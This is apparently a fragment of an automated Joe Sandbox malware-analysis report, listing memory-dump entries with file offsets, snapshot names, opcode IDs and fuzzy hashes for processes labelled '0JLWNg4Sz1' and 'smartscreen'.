                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: a5be38d0f42e5eefa484697912fbcc383d0dc0646e2f2bdaac45392ad6a0e085
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 89B00205D6754F01E46431FA1D560A574505B45524FD61371D80D901B5984D16D55256
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: 1c721e6ed0b3f7ec69782d8678607aa2d241a2df428ee17e5eae6fb941ef5491
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: 2CB09222E2A31D42E32492A084602FE31520F44310F5AC6B2900F264E18C282B959680
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9$#{9
                                                          • API String ID: 0-1692736845
                                                          • Opcode ID: af50548f7992326802c82ce2d625add21f69f83c9cf8449446e955eeb9c5dee4
                                                          • Instruction ID: 1883a83be7a0e2941cb944b6b2183b0a7662e663af01b315dea99e39c48884ab
                                                          • Opcode Fuzzy Hash: af50548f7992326802c82ce2d625add21f69f83c9cf8449446e955eeb9c5dee4
                                                          • Instruction Fuzzy Hash: 8141C20BB9D52709E21A32FD75228FC6B46DFA1375B4843B7F05E890EB4E08608586E5
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: 34b20c2f54227a925371e3e52f426af9c15f873fae4c998717b44a7f8a130e19
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: 0521EA3130DD184FE768EA5CE889DB977D1EF9932171501BAE58EC7135E921EC8287C1
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6e7d0c36cbac15c4536afb87c67514c668876684cc02293625daadabfe5f058
                                                          • Instruction ID: 88512dc4be3314c9c89c26b773e79b59df5b6415e09fed041b264cbc423db556
                                                          • Opcode Fuzzy Hash: d6e7d0c36cbac15c4536afb87c67514c668876684cc02293625daadabfe5f058
                                                          • Instruction Fuzzy Hash: 3031E422B1EB9A0FE399A6E858B56B47B91AF55300F0902BAD41CC61F3CD182D848B41
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d041e439a231264497affbbb514daa67d6c0ac16fe8320558fe1e632edf41372
                                                          • Instruction ID: 3ac7bb6d99952755ea4d940b12fa1cdbb371838b1777ac125cbb46c7e27c1670
                                                          • Opcode Fuzzy Hash: d041e439a231264497affbbb514daa67d6c0ac16fe8320558fe1e632edf41372
                                                          • Instruction Fuzzy Hash: 1821FD20B19E1D0FE794F66C94AE67972C2EB98316F5141B9E40EC33F6DD38AC418245
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05d5dbf52502b06a3c602f185ef6e80c14c17164600e23713987a345a41849d9
                                                          • Instruction ID: 151e4b0beb62ad0b5b050ebe7d18e882e0a954ca63b835e13d615005b0d029b4
                                                          • Opcode Fuzzy Hash: 05d5dbf52502b06a3c602f185ef6e80c14c17164600e23713987a345a41849d9
                                                          • Instruction Fuzzy Hash: 1D31D521B1EB9E4FE7A5ABE458A96B97A91EF44300F0502BAD81DC20F3DD286D448B41
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8049f2d8f73606f1d1be9897cb76ffd656f0dcad911b8940cbb84486c76e6d42
                                                          • Instruction ID: 771995d3e838a8950de9fd3312a86624bd3ba711e40c8db3f1c2ff635c3e4183
                                                          • Opcode Fuzzy Hash: 8049f2d8f73606f1d1be9897cb76ffd656f0dcad911b8940cbb84486c76e6d42
                                                          • Instruction Fuzzy Hash: 4321D732F05A2D4BFB60DA5CD8647EA73E2EB84310F020276E419E72A4DE346D418F80
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b790000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78286710d2109668b93864f9ba1f73995eb0cbf50fe8b64484a9c6b12b57463b
                                                          • Instruction ID: 292b6adbefae0d9cf190d0caafde2971ec1dbaf003d9e75a148f806767fcbb03
                                                          • Opcode Fuzzy Hash: 78286710d2109668b93864f9ba1f73995eb0cbf50fe8b64484a9c6b12b57463b
                                                          • Instruction Fuzzy Hash: 70215E70E1965E8EEB749BE488656BE7BB1FF50300F11067EC026D72E6DF786A058B40
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81430c1ed3d5fba02304d1331be77d97815382da6fce95d38473287031a63478
                                                          • Instruction ID: 05776b5ab7812e7d16d24da183c7835101961520b1d547fd12a37d8dfc5a8032
                                                          • Opcode Fuzzy Hash: 81430c1ed3d5fba02304d1331be77d97815382da6fce95d38473287031a63478
                                                          • Instruction Fuzzy Hash: 0E21B935B0EB8D8FE721DBA888A51EC7FA0EF52315F1542FBD055871F2DA3826458741
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89ff0e0e47d14d8e1a5764c4221d0d45fa824f228dfa4e40059919c1b0c5e734
                                                          • Instruction ID: 35049095326d70aa496512f96236bbc9a552cd8c090ee5ce5bde88481f679557
                                                          • Opcode Fuzzy Hash: 89ff0e0e47d14d8e1a5764c4221d0d45fa824f228dfa4e40059919c1b0c5e734
                                                          • Instruction Fuzzy Hash: 50215E21B19E1E4FE7B4E75888B96B87392FF84311F1602B9E40ED76F2DE386E414640
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1b4e0ee7951fdc6aa86af9bda1eaf9afc2d4a9c033f9663802f045f16066089
                                                          • Instruction ID: 0029b46db328afb4bdfa5973ca95df04c69fcbeddab22fd5c4515a531802a66b
                                                          • Opcode Fuzzy Hash: e1b4e0ee7951fdc6aa86af9bda1eaf9afc2d4a9c033f9663802f045f16066089
                                                          • Instruction Fuzzy Hash: 61219631B0EA2E4FE794EB98D4647A43791EB55710F050679D41DD72EACE287D418F80
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: efd2c2f995a0dd7eccbf7cd241fcfd33cef35fd785eeba5251628edc4a7aeee2
                                                          • Instruction ID: 8ab4e5a81bf5f660d52921c7704ca58c3be4052d03448fc9c7f6d4a1ceeb1b62
                                                          • Opcode Fuzzy Hash: efd2c2f995a0dd7eccbf7cd241fcfd33cef35fd785eeba5251628edc4a7aeee2
                                                          • Instruction Fuzzy Hash: D0115730B09E0DCFDB64EB48C494BA973E1FB98305F5142A9D04ED72B5CA38AA808B45
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c0e7302252a2634fc998e7394e1dbf4f08b1f72595603214b53fbfb1d9ad9e1
                                                          • Instruction ID: fd01b24cb407dfc5d7640c2717112a364d67733803710e3d2f9b09cf31ce461a
                                                          • Opcode Fuzzy Hash: 9c0e7302252a2634fc998e7394e1dbf4f08b1f72595603214b53fbfb1d9ad9e1
                                                          • Instruction Fuzzy Hash: 2A110321B09E0D4BEBA4E66888E96B873E2FF94342F1701BDD00ED72F2DD786A414604
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb0da6a46d4b284f971977a24772ad0f3cf71952490efb496d7a76abeeff8f5f
                                                          • Instruction ID: 2e38703c29142a61fa252b8a39681d6c79e9074dc4c8b36c25cb3b1b83aa0859
                                                          • Opcode Fuzzy Hash: bb0da6a46d4b284f971977a24772ad0f3cf71952490efb496d7a76abeeff8f5f
                                                          • Instruction Fuzzy Hash: F4118635B0EB8D8FE712DB6898A51EC7FB0EF52211F1646F7C484DB1E2D93416498781
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19db932d4f1c2bbe0a0808931d93862589bcb9a27b90fd838e650ab4f23d014b
                                                          • Instruction ID: 4e4392fc96fbcd619fc3fb2976a3f1c39e4370241dca250fbd9c1ea120ce8e0e
                                                          • Opcode Fuzzy Hash: 19db932d4f1c2bbe0a0808931d93862589bcb9a27b90fd838e650ab4f23d014b
                                                          • Instruction Fuzzy Hash: 34F0F42BA4D2914ED709B27C74B28FC7F918F5223974881FBE09D8E4E7CD0994898A85
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7a4000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction ID: 73a94d5e0ffa73a9c18385e28098f995084bfa180df6cf0793deee9320a8a679
                                                          • Opcode Fuzzy Hash: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction Fuzzy Hash: ED019675A1CB888FD7A4DF18844572AB7E2FBA8315F114A2EA09DD3660DB30A8018B42
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23a8a7d32beeb55120a499870c0f04a1bd7d4f728746e43c8beaf3061e686c84
                                                          • Instruction ID: 7e7458c80985b8e4f0945d7dbd4c815da9c231f5767b950c77639bed8fac47bf
                                                          • Opcode Fuzzy Hash: 23a8a7d32beeb55120a499870c0f04a1bd7d4f728746e43c8beaf3061e686c84
                                                          • Instruction Fuzzy Hash: E9016135A0EB8C8FE712DB6488A41DDBFB0EF52211F1646EBC485DB1E2DA3456498B81
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: 5f4a9e9009faadc229a886ba962064a22a19c0a60235ae16323da3e99fa88289
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 68F03630B19D1D8EEB64EA54D8E56F873A1FF54312F1601FDD00ED36B1DD786A814A04
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22ce549bbfd7c800b6d17687c66b772ff1afef4bbaee5eb64470807c5b49c2df
                                                          • Instruction ID: 9fded2165a8ee09850ed128bf77fbd31f66c5331c0a01e8dd1c81888c302fced
                                                          • Opcode Fuzzy Hash: 22ce549bbfd7c800b6d17687c66b772ff1afef4bbaee5eb64470807c5b49c2df
                                                          • Instruction Fuzzy Hash: 9BF0B461B0AA1E4FEA98FB9844EA7F476C2EF58304F140235D41DC26B3DE282C804F42
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27204e0678c9fe9de8d125915eb7b8bb1059bd83c89202b1961172c7450f7150
                                                          • Instruction ID: 00bbdaf113da6d1a47c76f7260f8b7c5db667e7490eae7c43f01a6ee9f3c926f
                                                          • Opcode Fuzzy Hash: 27204e0678c9fe9de8d125915eb7b8bb1059bd83c89202b1961172c7450f7150
                                                          • Instruction Fuzzy Hash: 84018434A0D7888FD722DB6484A41DDBFB0EF02315F1542EBC484CB1E2D9345644C741
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b99941d558667ae4b3966f44dc7deab78d51fbb592e1f293feeb77f820a8f7ea
                                                          • Instruction ID: 095341d49bdc517e12f42d9926f58df8dc460d3c7089602cac90db1005407e46
                                                          • Opcode Fuzzy Hash: b99941d558667ae4b3966f44dc7deab78d51fbb592e1f293feeb77f820a8f7ea
                                                          • Instruction Fuzzy Hash: 4DF0E531B1C7880FC7199A2958A54A17BF1DF5B20534A42FFD49ACB2E3DD28AC458741
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f15983fc7a475cccc271237704d63c895e45690ff786fac8de0724e410e80734
                                                          • Instruction ID: 2ac05bfdfb2c12131e8a4d3fd080bda2b2c37ab6d76c7dcffcc253080c5b1923
                                                          • Opcode Fuzzy Hash: f15983fc7a475cccc271237704d63c895e45690ff786fac8de0724e410e80734
                                                          • Instruction Fuzzy Hash: 7BE09230B09B884FCB0E9A29886C4607BA1EF6611278942FFC405CB1A3ED29DC84CB41
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e068ef4d23bd457f8cda16b2c8bcecf64da4f460d9fddb2d52e8c7a4cf8f1072
                                                          • Instruction ID: fd3870ddbc990059cf26fb1951a14564975488d416f3da713d870f96bf3656eb
                                                          • Opcode Fuzzy Hash: e068ef4d23bd457f8cda16b2c8bcecf64da4f460d9fddb2d52e8c7a4cf8f1072
                                                          • Instruction Fuzzy Hash: 27E09B30B597844FC70A963848654607BA1EF5710178951FFC445CB1D3DD18DC85C741
                                                          Memory Dump Source
                                                          • Instruction Fuzzy Hash: 0791F3B5A19A9D8FEB59DF6888797A87FE1FB95300F4001BBD049C72E6EE781814C701
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 911eb64e75c7de47024fae8dec8b52275339a6101a32f3bb6a45ab5fcb044c71
                                                          • Instruction ID: f61e2398aa7a7d1b4eb05635db38817e3573b124f49e635525609ff286a63cf4
                                                          • Opcode Fuzzy Hash: 911eb64e75c7de47024fae8dec8b52275339a6101a32f3bb6a45ab5fcb044c71
                                                          • Instruction Fuzzy Hash: 43B1BC35A2E75E07E32C49594C930B57395EB92306B29837CCDEB838E7DD18B52342C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dN_H
                                                          • API String ID: 0-2854262715
                                                          • Opcode ID: 176aa5b4676235bc4ab59b01f392f2ac68e77c369c9b73448d46bb7944481ba1
                                                          • Instruction ID: 55a5a717f35bf3c5fbe28f951ca1ba6e5798e40ee798a2a8d26eadc50a16bcfb
                                                          • Opcode Fuzzy Hash: 176aa5b4676235bc4ab59b01f392f2ac68e77c369c9b73448d46bb7944481ba1
                                                          • Instruction Fuzzy Hash: 8251E771B1CB088FD75CDA5CA89667577E1EB99720F14026EE489C32A2DE35BC42C783
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V
                                                          • API String ID: 0-1342839628
                                                          • Opcode ID: 4e6496f64f42885405f4db13649c2755b6f97f01980fc5e3dcd63997c3dae0ff
                                                          • Instruction ID: 1f0f1327a7f76eb37d78ca9088e0e5e244f3761c4e690fc2808b12311b7869db
                                                          • Opcode Fuzzy Hash: 4e6496f64f42885405f4db13649c2755b6f97f01980fc5e3dcd63997c3dae0ff
                                                          • Instruction Fuzzy Hash: 9101262098E6C60FDB1947B04C75AF63F918F8721070A02FBE089CB4F3C84D198683A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: f12c0a075ec27cfbf5fef80b8620e91a67aa2f93c00d3bf6be23cb0d9f5c98cd
                                                          • Instruction ID: 183ec4e01b1e37abc7825f8b17b69fe653e45be46e7cbd0f7b237246f925c800
                                                          • Opcode Fuzzy Hash: f12c0a075ec27cfbf5fef80b8620e91a67aa2f93c00d3bf6be23cb0d9f5c98cd
                                                          • Instruction Fuzzy Hash: F301AD60A4F3C51FDB13A7794829414BFB0EE2720034A02EFC086CF5B3D91D498AC702
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 2c527e1d9c0e6d52423112981ac464d116d1382743bfd84b1ed4f50b27f9ea42
                                                          • Instruction ID: 50b7503b6ec1246df5541ed247b2786542c01a9767911684e283345212366f3f
                                                          • Opcode Fuzzy Hash: 2c527e1d9c0e6d52423112981ac464d116d1382743bfd84b1ed4f50b27f9ea42
                                                          • Instruction Fuzzy Hash: 22F06561A0F7C44FCB1A9A7488694547FA0EF6721174A52EFC445CF1A3EA1D9885C711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 7bd68e51fb2e6f9cfb95b9e5e53aea50fab733c3c41e411c04606f8199004131
                                                          • Instruction ID: b40802a4a57691287cffb446406ad976357db3b0b6b90848e9474288c9d378c8
                                                          • Opcode Fuzzy Hash: 7bd68e51fb2e6f9cfb95b9e5e53aea50fab733c3c41e411c04606f8199004131
                                                          • Instruction Fuzzy Hash: 90E09271A4F7C44FCB16EA348869454BFA0EF6720174A52EFC086CF5A3EA2DC889C701
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V
                                                          • API String ID: 0-1342839628
                                                          • Opcode ID: 8ff6170bfc00ded071552b819af9ad04e304f33f11e510be431c6c09e4be9d2f
                                                          • Instruction ID: 460ba21d971b45360204ad46af60fac19f9ae869c52dbe30bb146aae283d1bcc
                                                          • Opcode Fuzzy Hash: 8ff6170bfc00ded071552b819af9ad04e304f33f11e510be431c6c09e4be9d2f
                                                          • Instruction Fuzzy Hash: 0FE0C210A2E7970FE326637418600E87B609F4660078A01F6D448CE0E3D84D098643D3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: ed299b62728f3847367148c1fb24ccc546231eec544961699d3004de9db2fef6
                                                          • Instruction ID: 8cd8ab4dadf664225cd20ee715cbc7d3f5c641927203da29c304c080838b3de1
                                                          • Opcode Fuzzy Hash: ed299b62728f3847367148c1fb24ccc546231eec544961699d3004de9db2fef6
                                                          • Instruction Fuzzy Hash: 19E01A6194F3C45FCB5AAB74887A8443FA0EE6B21078B41EEC089CF5B3E62D9949C701
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: d4a9066e90e29e43fb23130c2b374d38154cdaae4fa6d731389d5539c282ff6a
                                                          • Instruction ID: c070582c185fe029ab4e027ed204f63b3dbf8541ba8d5b261cc9ee5c41427e78
                                                          • Opcode Fuzzy Hash: d4a9066e90e29e43fb23130c2b374d38154cdaae4fa6d731389d5539c282ff6a
                                                          • Instruction Fuzzy Hash: 88E09A7194F7C44FCB06EB7488A98047FA0AF2720078B00EEC085CF0B3E62D8848C701
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 3d972ce09f3ed6c7852a33420eef1defb77debc4615dc417ebcfe6d2c6c695c8
                                                          • Instruction ID: 0cd8743d9b17d8eac5fda8a8b4ae23438b8d7c090cd5d09a2f178359511b3836
                                                          • Opcode Fuzzy Hash: 3d972ce09f3ed6c7852a33420eef1defb77debc4615dc417ebcfe6d2c6c695c8
                                                          • Instruction Fuzzy Hash: 79E0BF7154A3C44FCB16EB7488699957FB0EE6721178B41EEC149CF1B3E62D894AC701
                                                          Strings
                                                          Memory Dump Source
